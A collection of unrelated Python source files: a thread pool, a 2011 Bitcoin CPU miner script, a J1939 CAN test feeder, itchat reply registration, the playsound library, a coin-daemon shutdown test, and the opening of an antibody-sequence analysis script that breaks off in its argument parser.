# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
A simple thread pool implementation
"""
import multiprocessing
import queue
import threading
import traceback
from time import time
from splunktalib.common import log
class ThreadPool:
"""
A simple thread pool implementation
"""
_high_watermark = 0.2
_resize_window = 10
def __init__(self, min_size=1, max_size=128, task_queue_size=1024, daemon=True):
assert task_queue_size
if not min_size or min_size <= 0:
min_size = multiprocessing.cpu_count()
if not max_size or max_size <= 0:
max_size = multiprocessing.cpu_count() * 8
self._min_size = min_size
self._max_size = max_size
self._daemon = daemon
self._work_queue = queue.Queue(task_queue_size)
self._thrs = []
for _ in range(min_size):
thr = threading.Thread(target=self._run)
self._thrs.append(thr)
self._admin_queue = queue.Queue()
self._admin_thr = threading.Thread(target=self._do_admin)
self._last_resize_time = time()
self._last_size = min_size
self._lock = threading.Lock()
self._occupied_threads = 0
self._count_lock = threading.Lock()
self._started = False
def start(self):
"""
Start threads in the pool
"""
with self._lock:
if self._started:
return
self._started = True
for thr in self._thrs:
thr.daemon = self._daemon
thr.start()
self._admin_thr.start()
log.logger.info("ThreadPool started.")
def tear_down(self):
"""
Tear down thread pool
"""
with self._lock:
if not self._started:
return
self._started = False
for thr in self._thrs:
self._work_queue.put(None, block=True)
self._admin_queue.put(None)
if not self._daemon:
log.logger.info("Wait for threads to stop.")
for thr in self._thrs:
thr.join()
self._admin_thr.join()
log.logger.info("ThreadPool stopped.")
def enqueue_funcs(self, funcs, block=True):
"""
run jobs in a fire and forget way, no result will be handled
over to clients
:param funcs: tuple/list-like or generator like object, func shall be
callable
"""
if not self._started:
log.logger.info("ThreadPool has already stopped.")
return
for func in funcs:
self._work_queue.put(func, block)
def apply_async(self, func, args=(), kwargs=None, callback=None):
"""
:param func: callable
:param args: free params
:param kwargs: named params
:callback: when func is done and without exception, call the callback
:return AsyncResult, clients can poll or wait the result through it
"""
if not self._started:
log.logger.info("ThreadPool has already stopped.")
return None
res = AsyncResult(func, args, kwargs, callback)
self._work_queue.put(res)
return res
def apply(self, func, args=(), kwargs=None):
"""
:param func: callable
:param args: free params
:param kwargs: named params
:return whatever the func returns
"""
if not self._started:
log.logger.info("ThreadPool has already stopped.")
return None
res = self.apply_async(func, args, kwargs)
return res.get()
def size(self):
return self._last_size
def resize(self, new_size):
"""
Resize the pool size, spawn or destroy threads if necessary
"""
if new_size <= 0:
return
if self._lock.locked() or not self._started:
log.logger.info(
"Try to resize thread pool during the tear " "down process, do nothing"
)
return
with self._lock:
self._remove_exited_threads_with_lock()
size = self._last_size
self._last_size = new_size
if new_size > size:
for _ in range(new_size - size):
thr = threading.Thread(target=self._run)
thr.daemon = self._daemon
thr.start()
self._thrs.append(thr)
elif new_size < size:
for _ in range(size - new_size):
self._work_queue.put(None)
log.logger.info("Finished ThreadPool resizing. New size=%d", new_size)
def _remove_exited_threads_with_lock(self):
"""
Join the exited threads last time when resize was called
"""
joined_thrs = set()
for thr in self._thrs:
if not thr.is_alive():
try:
if not thr.daemon:
thr.join(timeout=0.5)
joined_thrs.add(thr.ident)
except RuntimeError:
pass
if joined_thrs:
live_thrs = []
for thr in self._thrs:
if thr.ident not in joined_thrs:
live_thrs.append(thr)
self._thrs = live_thrs
def _do_resize_according_to_loads(self):
if (
self._last_resize_time
and time() - self._last_resize_time < self._resize_window
):
return
thr_size = self._last_size
free_thrs = thr_size - self._occupied_threads
work_size = self._work_queue.qsize()
log.logger.debug(
"current_thr_size=%s, free_thrs=%s, work_size=%s",
thr_size,
free_thrs,
work_size,
)
if work_size and work_size > free_thrs:
if thr_size < self._max_size:
thr_size = min(thr_size * 2, self._max_size)
self.resize(thr_size)
elif free_thrs > 0:
free = free_thrs * 1.0
if free / thr_size >= self._high_watermark and free_thrs >= 2:
# 20 % thrs are idle, tear down half of the idle ones
thr_size = thr_size - int(free_thrs // 2)
if thr_size > self._min_size:
self.resize(thr_size)
self._last_resize_time = time()
def _do_admin(self):
admin_q = self._admin_queue
resize_win = self._resize_window
while 1:
try:
wakup = admin_q.get(timeout=resize_win + 1)
except queue.Empty:
self._do_resize_according_to_loads()
continue
if wakup is None:
break
else:
self._do_resize_according_to_loads()
log.logger.info(
"ThreadPool admin thread=%s stopped.", threading.current_thread().getName()
)
def _run(self):
"""
Threads callback func, run forever to handle jobs from the job queue
"""
work_queue = self._work_queue
count_lock = self._count_lock
while 1:
log.logger.debug("Going to get job")
func = work_queue.get()
if func is None:
break
if not self._started:
break
log.logger.debug("Going to exec job")
with count_lock:
self._occupied_threads += 1
try:
func()
except Exception:
log.logger.error(traceback.format_exc())
with count_lock:
self._occupied_threads -= 1
log.logger.debug("Done with exec job")
log.logger.info("Thread work_queue_size=%d", work_queue.qsize())
log.logger.debug(
"Worker thread %s stopped.", threading.current_thread().getName()
)
class AsyncResult:
def __init__(self, func, args, kwargs, callback):
self._func = func
self._args = args
self._kwargs = kwargs
self._callback = callback
self._q = queue.Queue()
def __call__(self):
try:
if self._args and self._kwargs:
res = self._func(*self._args, **self._kwargs)
elif self._args:
res = self._func(*self._args)
elif self._kwargs:
res = self._func(**self._kwargs)
else:
res = self._func()
except Exception as e:
self._q.put(e)
return
else:
self._q.put(res)
if self._callback is not None:
self._callback()
def get(self, timeout=None):
"""
Return the result when it arrives. If timeout is not None and the
result does not arrive within timeout seconds then
multiprocessing.TimeoutError is raised. If the remote call raised an
exception then that exception will be reraised by get().
"""
try:
res = self._q.get(timeout=timeout)
except queue.Empty:
raise multiprocessing.TimeoutError("Timed out")
if isinstance(res, Exception):
raise res
return res
def wait(self, timeout=None):
"""
Wait until the result is available or until timeout seconds pass.
"""
try:
res = self._q.get(timeout=timeout)
except queue.Empty:
pass
else:
self._q.put(res)
def ready(self):
"""
Return whether the call has completed.
"""
return len(self._q)
def successful(self):
"""
Return whether the call completed without raising an exception.
Will raise AssertionError if the result is not ready.
"""
if not self.ready():
raise AssertionError("Function is not ready")
res = self._q.get()
self._q.put(res)
if isinstance(res, Exception):
return False
return True
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 6668
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
feeder.py
|
import logging
import queue
import threading
import time
import j1939
from j1939.message_id import MessageId
from j1939.parameter_group_number import ParameterGroupNumber
logger = logging.getLogger(__name__)
class AcceptAllCA(j1939.ControllerApplication):
"""CA to accept all messages"""
def __init__(self, name, device_address_preferred, bypass_address_claim):
# old fashion calling convention for compatibility with Python2
j1939.ControllerApplication.__init__(self, name, device_address_preferred, bypass_address_claim)
def message_acceptable(self, dest_address):
"""Indicates if this CA would accept a message
(OVERLOADED FUNCTION)
This function indicates the acceptance of this CA for the given dest_address.
"""
return True
class Feeder:
"""
Simulated/mocked CAN message feeder for tests. Tests can use this class to specify
expected rx and tx messages via Feeder.can_messages. Overrides
j1939.ElectronicControlUnit.send_message, checking that tx message data matches
expected data, and then injecting the expected rx nessage into the ECU
"""
class MsgType(object):
CANRX = 0
CANTX = 1
PDU = 2
def __init__(self):
self.STOP_THREAD = object()
self.message_queue = queue.Queue()
self.message_thread = threading.Thread(target=self._async_can_feeder)
self.message_thread.start()
# redirect the send_message from the can bus to our simulation
self.ecu = j1939.ElectronicControlUnit(send_message=self._send_message)
def _async_can_feeder(self):
"""Asynchronous feeder"""
while True:
message = self.message_queue.get(block=True)
if message is self.STOP_THREAD:
break
recv_time = message[3]
if recv_time == 0.0:
recv_time = time.time()
self.ecu.notify(message[1], message[2], recv_time)
def _inject_messages_into_ecu(self):
while self.can_messages and self.can_messages[0][0] == Feeder.MsgType.CANRX:
message = self.can_messages.pop(0)
self.message_queue.put(message)
def _send_message(self, can_id, data):
"""Will be used instead of the usual ecu.send_message method.
Checks the message sent and generates the apropriate answer.
The data is fed from self.can_messages.
"""
logger.info(
f'send message ID: {can_id:04x}, data: {["{:02x}".format(val) for val in data]}'
)
expected_data = self.can_messages.pop(0)
assert expected_data[0] == Feeder.MsgType.CANTX
assert can_id == expected_data[1]
assert data == expected_data[2]
self._inject_messages_into_ecu()
def _on_message(self, priority, pgn, sa, timestamp, data):
"""Feed incoming message to this testcase.
:param int priority:
Priority of the message
:param int pgn:
Parameter Group Number of the message
:param sa:
Source Address of the message
:param timestamp:
Timestamp of the message
:param bytearray data:
Data of the PDU
"""
logger.info(
f'received from sa {sa:02x} pgn {pgn:04x} data: {["{:02x}".format(val) for val in data]}'
)
expected_data = self.pdus.pop(0)
assert expected_data[0] == Feeder.MsgType.PDU
assert pgn == expected_data[1]
if isinstance(data, list):
assert data == expected_data[2]
else:
assert data is None
def pdus_from_messages(self):
self.pdus = []
for message in self.can_messages:
if message[0] is Feeder.MsgType.CANRX:
pgn = ParameterGroupNumber()
pgn.from_message_id(MessageId(can_id=message[1]))
self.pdus.append((Feeder.MsgType.PDU, pgn.value & 0xFF00, message[2]))
def accept_all_messages(
self, device_address_preferred=None, bypass_address_claim=False
):
# install a fake-CA to accept all messages
ca = AcceptAllCA(None, device_address_preferred, bypass_address_claim)
self.ecu.add_ca(controller_application=ca)
return ca
def receive(self):
self.ecu.subscribe(self._on_message)
self._inject_messages_into_ecu()
# wait until all messages are processed asynchronously
while len(self.pdus) > 0:
time.sleep(0.500)
# wait for final processing
time.sleep(0.100)
self.ecu.unsubscribe(self._on_message)
def send(self, pdu, source, destination):
self.ecu.subscribe(self._on_message)
self.ecu.send_pgn(0, pdu[1] >> 8, destination, 6, source, pdu[2])
self.process_messages()
def process_messages(self):
# wait until all messages are processed asynchronously
while len(self.can_messages) > 0:
time.sleep(0.500)
# wait for final processing
time.sleep(0.100)
self.ecu.unsubscribe(self._on_message)
def stop(self):
self.ecu.stop()
self.message_queue.put(self.STOP_THREAD)
self.message_thread.join()
|
register.py
|
import logging, traceback, sys, threading
try:
import Queue
except ImportError:
import queue as Queue
from ..log import set_logging
from ..utils import test_connect
logger = logging.getLogger('itchat')
def load_register(core):
core.auto_login = auto_login
core.configured_reply = configured_reply
core.msg_register = msg_register
core.run = run
def auto_login(self, hotReload=False, statusStorageDir='itchat.pkl',
enableCmdQR=False, picDir=None, qrCallback=None,
loginCallback=None, exitCallback=None):
if not test_connect():
logger.info("You can't get access to internet or wechat domain, so exit.")
sys.exit()
self.useHotReload = hotReload
if hotReload:
if self.load_login_status(statusStorageDir,
loginCallback=loginCallback, exitCallback=exitCallback):
return
self.login(enableCmdQR=enableCmdQR, picDir=picDir, qrCallback=qrCallback,
loginCallback=loginCallback, exitCallback=exitCallback)
self.dump_login_status(statusStorageDir)
self.hotReloadDir = statusStorageDir
else:
self.login(enableCmdQR=enableCmdQR, picDir=picDir, qrCallback=qrCallback,
loginCallback=loginCallback, exitCallback=exitCallback)
def configured_reply(self):
''' determine the type of message and reply if its method is defined
however, I use a strange way to determine whether a msg is from massive platform
I haven't found a better solution here
The main problem I'm worrying about is the mismatching of new friends added on phone
If you have any good idea, pleeeease report an issue. I will be more than grateful.
'''
try:
msg = self.msgList.get(timeout=1)
except Queue.Empty:
pass
else:
if msg['FromUserName'] == self.storageClass.userName:
actualOpposite = msg['ToUserName']
else:
actualOpposite = msg['FromUserName']
if '@@' in actualOpposite:
replyFn = self.functionDict['GroupChat'].get(msg['Type'])
elif self.search_mps(userName=msg['FromUserName']):
replyFn = self.functionDict['MpChat'].get(msg['Type'])
elif '@' in actualOpposite or \
actualOpposite in ('filehelper', 'fmessage'):
replyFn = self.functionDict['FriendChat'].get(msg['Type'])
else:
replyFn = self.functionDict['MpChat'].get(msg['Type'])
if replyFn is None:
r = None
else:
try:
r = replyFn(msg)
if r is not None:
self.send(r, msg.get('FromUserName'))
except:
logger.warning(traceback.format_exc())
def msg_register(self, msgType, isFriendChat=False, isGroupChat=False, isMpChat=False):
''' a decorator constructor
return a specific decorator based on information given '''
if not isinstance(msgType, list):
msgType = [msgType]
def _msg_register(fn):
for _msgType in msgType:
if isFriendChat:
self.functionDict['FriendChat'][_msgType] = fn
if isGroupChat:
self.functionDict['GroupChat'][_msgType] = fn
if isMpChat:
self.functionDict['MpChat'][_msgType] = fn
if not any((isFriendChat, isGroupChat, isMpChat)):
self.functionDict['FriendChat'][_msgType] = fn
return _msg_register
def run(self, debug=False, blockThread=True):
logger.info('Start auto replying.')
if debug:
set_logging(loggingLevel=logging.DEBUG)
def reply_fn():
try:
while self.alive:
self.configured_reply()
except KeyboardInterrupt:
if self.useHotReload:
self.dump_login_status()
self.alive = False
logger.debug('itchat received an ^C and exit.')
logger.info('Bye~')
if blockThread:
reply_fn()
else:
replyThread = threading.Thread(target=reply_fn)
replyThread.setDaemon(True)
replyThread.start()
|
playsound.py
|
import logging
logger = logging.getLogger(__name__)
_openedSoundsWin = []
class PlaysoundException(Exception):
pass
def _canonicalizePath(path):
"""
Support passing in a pathlib.Path-like object by converting to str.
"""
import sys
if sys.version_info[0] >= 3:
return str(path)
else:
# On earlier Python versions, str is a byte string, so attempting to
# convert a unicode string to str will fail. Leave it alone in this case.
return path
def _playsoundWin(sound, block = True):
'''
Utilizes windll.winmm. Tested and known to work with MP3 and WAVE on
Windows 7 with Python 2.7. Probably works with more file formats.
Probably works on Windows XP thru Windows 10. Probably works with all
versions of Python.
Inspired by (but not copied from) Michael Gundlach <gundlach@gmail.com>'s mp3play:
https://github.com/michaelgundlach/mp3play
I never would have tried using windll.winmm without seeing his code.
'''
sound = '"' + _canonicalizePath(sound) + '"'
from ctypes import create_unicode_buffer, windll, wintypes
from time import sleep
windll.winmm.mciSendStringW.argtypes = [wintypes.LPCWSTR, wintypes.LPWSTR, wintypes.UINT, wintypes.HANDLE]
windll.winmm.mciGetErrorStringW.argtypes = [wintypes.DWORD, wintypes.LPWSTR, wintypes.UINT]
def winCommand(*command):
bufLen = 600
buf = create_unicode_buffer(bufLen)
command = ' '.join(command)
errorCode = int(windll.winmm.mciSendStringW(command, buf, bufLen - 1, 0)) # use widestring version of the function
if errorCode:
errorBuffer = create_unicode_buffer(bufLen)
windll.winmm.mciGetErrorStringW(errorCode, errorBuffer, bufLen - 1) # use widestring version of the function
exceptionMessage = ('\n Error ' + str(errorCode) + ' for command:'
'\n ' + command +
'\n ' + errorBuffer.value)
logger.error(exceptionMessage)
raise PlaysoundException(exceptionMessage)
return buf.value
try:
logger.debug('Starting')
if (sound in _openedSoundsWin):
winCommand(u'close {}'.format(sound))
_openedSoundsWin.remove(sound)
winCommand(u'open {}'.format(sound))
winCommand(u'play {}{}'.format(sound, ' wait' if block else ''))
if not block:
_openedSoundsWin.append(sound)
logger.debug('Returning')
finally:
try:
if (block):
winCommand(u'close {}'.format(sound))
else:
pass
except PlaysoundException:
logger.warning(u'Failed to close the file: {}'.format(sound))
# If it fails, there's nothing more that can be done...
pass
def _handlePathOSX(sound):
sound = _canonicalizePath(sound)
if '://' not in sound:
if not sound.startswith('/'):
from os import getcwd
sound = getcwd() + '/' + sound
sound = 'file://' + sound
try:
# Don't double-encode it.
sound.encode('ascii')
return sound.replace(' ', '%20')
except UnicodeEncodeError:
try:
from urllib.parse import quote # Try the Python 3 import first...
except ImportError:
from urllib import quote # Try using the Python 2 import before giving up entirely...
parts = sound.split('://', 1)
return parts[0] + '://' + quote(parts[1].encode('utf-8')).replace(' ', '%20')
def _playsoundOSX(sound, block = True):
'''
Utilizes AppKit.NSSound. Tested and known to work with MP3 and WAVE on
OS X 10.11 with Python 2.7. Probably works with anything QuickTime supports.
Probably works on OS X 10.5 and newer. Probably works with all versions of
Python.
Inspired by (but not copied from) Aaron's Stack Overflow answer here:
http://stackoverflow.com/a/34568298/901641
I never would have tried using AppKit.NSSound without seeing his code.
'''
try:
from AppKit import NSSound
except ImportError:
logger.warning("playsound could not find a copy of AppKit - falling back to using macOS's system copy.")
sys.path.append('/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC')
from AppKit import NSSound
from Foundation import NSURL
from time import sleep
sound = _handlePathOSX(sound)
url = NSURL.URLWithString_(sound)
if not url:
raise PlaysoundException('Cannot find a sound with filename: ' + sound)
for i in range(5):
nssound = NSSound.alloc().initWithContentsOfURL_byReference_(url, True)
if nssound:
break
else:
logger.debug('Failed to load sound, although url was good... ' + sound)
else:
raise PlaysoundException('Could not load sound with filename, although URL was good... ' + sound)
nssound.play()
if block:
sleep(nssound.duration())
def _playsoundNix(sound, block = True):
"""Play a sound using GStreamer.
Inspired by this:
https://gstreamer.freedesktop.org/documentation/tutorials/playback/playbin-usage.html
"""
sound = _canonicalizePath(sound)
# pathname2url escapes non-URL-safe characters
from os.path import abspath, exists
try:
from urllib.request import pathname2url
except ImportError:
# python 2
from urllib import pathname2url
import gi
gi.require_version('Gst', '1.0')
from gi.repository import Gst
Gst.init(None)
playbin = Gst.ElementFactory.make('playbin', 'playbin')
if sound.startswith(('http://', 'https://')):
playbin.props.uri = sound
else:
path = abspath(sound)
if not exists(path):
raise PlaysoundException(u'File not found: {}'.format(path))
playbin.props.uri = 'file://' + pathname2url(path)
set_result = playbin.set_state(Gst.State.PLAYING)
if set_result != Gst.StateChangeReturn.ASYNC:
raise PlaysoundException(
"playbin.set_state returned " + repr(set_result))
# FIXME: use some other bus method than poll() with block=False
# https://lazka.github.io/pgi-docs/#Gst-1.0/classes/Bus.html
logger.debug('Starting play')
if block:
bus = playbin.get_bus()
try:
bus.poll(Gst.MessageType.EOS, Gst.CLOCK_TIME_NONE)
finally:
playbin.set_state(Gst.State.NULL)
logger.debug('Finishing play')
def _playsoundAnotherPython(otherPython, sound, block = True, macOS = False):
'''
Mostly written so that when this is run on python3 on macOS, it can invoke
python2 on macOS... but maybe this idea could be useful on linux, too.
'''
from inspect import getsourcefile
from os.path import abspath, exists
from subprocess import check_call
from threading import Thread
sound = _canonicalizePath(sound)
class PropogatingThread(Thread):
def run(self):
self.exc = None
try:
self.ret = self._target(*self._args, **self._kwargs)
except BaseException as e:
self.exc = e
def join(self, timeout = None):
super().join(timeout)
if self.exc:
raise self.exc
return self.ret
# Check if the file exists...
if not exists(abspath(sound)):
raise PlaysoundException('Cannot find a sound with filename: ' + sound)
playsoundPath = abspath(getsourcefile(lambda: 0))
t = PropogatingThread(target = lambda: check_call([otherPython, playsoundPath, _handlePathOSX(sound) if macOS else sound]))
t.start()
if block:
t.join()
from platform import system
system = system()
if system == 'Windows':
playsound = _playsoundWin
elif system == 'Darwin':
playsound = _playsoundOSX
import sys
if sys.version_info[0] > 2:
try:
from AppKit import NSSound
except ImportError:
logger.warning("playsound is relying on a python 2 subprocess. Please use `pip3 install PyObjC` if you want playsound to run more efficiently.")
playsound = lambda sound, block = True: _playsoundAnotherPython('/System/Library/Frameworks/Python.framework/Versions/2.7/bin/python', sound, block, macOS = True)
else:
playsound = _playsoundNix
if __name__ != '__main__': # Ensure we don't infinitely recurse trying to get another python instance.
try:
import gi
gi.require_version('Gst', '1.0')
from gi.repository import Gst
except:
logger.warning("playsound is relying on another python subprocess. Please use `pip install pygobject` if you want playsound to run more efficiently.")
playsound = lambda sound, block = True: _playsoundAnotherPython('/usr/bin/python3', sound, block, macOS = False)
del system
if __name__ == '__main__':
# block is always True if you choose to run this from the command line.
from sys import argv
playsound(argv[1])
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Copyright (c) 2017-2019 The Raven Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test mulecoind shutdown."""
from threading import Thread
from test_framework.test_framework import MulecoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy, wait_until
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(MulecoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coverage_dir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2, err_msg="wait until getrpcinfo active commands")
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0) #, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
_finder.py
|
#!/usr/bin/python
# filename: _finder.py
#
# Copyright (c) 2015 Bryan Briney
# License: The MIT license (http://opensource.org/licenses/MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software
# and associated documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish, distribute,
# sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
from __future__ import print_function
import multiprocessing as mp
import platform
import os
import subprocess as sp
import sys
import tempfile
from threading import Thread
import time
import numpy as np
import pandas as pd
from pymongo import MongoClient
from Bio import SeqIO
import matplotlib as mpl
import matplotlib.pyplot as plt
import seaborn as sns
from abtools import color, log, mongodb
from abtools.utils import progbar
def parse_args():
import argparse
parser = argparse.ArgumentParser("For a MongoDB collection, plots the germline divergence against the sequence identity to a given 'subject' sequence.")
parser.add_argument('-d', '--database', dest='db', required=True,
help="Name of the MongoDB database to query. Required.")
parser.add_argument('-c', '--collection', dest='collection', default=None,
help="Name of the MongoDB collection to query. \
If not provided, all collections in the given database will be processed iteratively.")
parser.add_argument('--collection-prefix', dest='collection_prefix', default=None,
help="If supplied, will iteratively process only collections beginning with <collection_prefix>.")
parser.add_argument('-o', '--output', dest='output_dir', default=None,
help="Output directory figure files. If not provided, figures will not be generated. \
Directory will be created if it does not already exist.")
parser.add_argument('-t', '--temp', dest='temp_dir', required=True,
help="Directory for temporary storage. \
Will be created if it does not already exist. Required.")
parser.add_argument('-l', '--log', dest='log', default=None,
help="The log file, to which the blast_parse log info will be written. \
Default is <output>/abfinder.log.")
parser.add_argument('-C', '--cluster', dest="cluster", default=False, action='store_true',
help="Use if performing computation on a Celery cluster. \
If set, input files will be split into many subfiles and passed to a Celery queue. \
If not set, input files will still be split, \
but will be distributed to local processors using multiprocessing.")
parser.add_argument('-i', '--ip', dest='ip', default='localhost',
help="The IP address for the MongoDB server. \
Defaults to 'localhost'.")
parser.add_argument('--port', dest='port', default=27017,
help="The port for the MongoDB server. Defaults to '27017'.")
parser.add_argument('-u', '--user', dest='user', default=None,
help="Username for the MongoDB server. Not used if not provided.")
parser.add_argument('-p', '--password', dest='password', default=None,
help="Password for the MongoDB server. Not used if not provided.")
parser.add_argument('-s', '--standard', dest='standard', required=True,
help='Path to a file containing the standard sequence(s) for which \
identity/divergence will be calculated, in FASTA format. \
All sequences in the standard file will iteratively processed. Required')
parser.add_argument('-q', '--chain', dest='chain', default='heavy',
choices=['heavy', 'kappa', 'lambda', 'light'],
help="The chain type of the subject sequence. \
Options are 'heavy', 'kappa', 'lambda' and 'light'. \
Default is 'heavy'.")
parser.add_argument('-n', '--no_update', dest='update', action='store_false', default=True,
help="Does not update the MongoDB with AbFinder info. \
Can save some time if the identity calculations aren't needed again.")
parser.add_argument('--no_figure', dest='make_figure', action='store_false', default=True,
help="Does not make the identity/divergence figure. \
Useful if you don't want the figure, just the identity info written to the database.")
parser.add_argument('--single-process-update', dest='single_process_update', action='store_true', default=False,
help="Perform the MongoDB update using a single process (without multiprocessing).")
parser.add_argument('--update-threads', dest='update_threads', type=int, default=25,
help="Number of threads to use when update the MongoDB database. Default is 25.")
